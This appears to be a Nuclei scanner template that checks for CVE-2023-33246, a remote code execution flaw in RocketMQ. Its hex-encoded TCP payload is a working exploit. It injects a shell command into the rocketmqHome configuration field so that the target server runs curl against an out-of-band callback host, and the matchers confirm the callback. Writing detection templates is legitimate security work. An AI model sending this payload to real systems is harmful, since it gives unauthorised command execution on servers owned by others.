id: CVE-2023-33246

info:
  name: RocketMQ versions <= 5.1.0 Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  reference: https://github.com/I5N0rth/CVE-2023-33246
  tags: cve,cve2023,rocketmq,rce

variables:
  part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
  part_b: '{{ hex_decode("3b0a") }}'
tcp:
  - inputs:
      - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b  }}'
        read: 1024
    host:
      - "{{Hostname}}"
    read-size: 4
#    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
      - type: word
        words:
          - "serializeTypeCurrentRPC"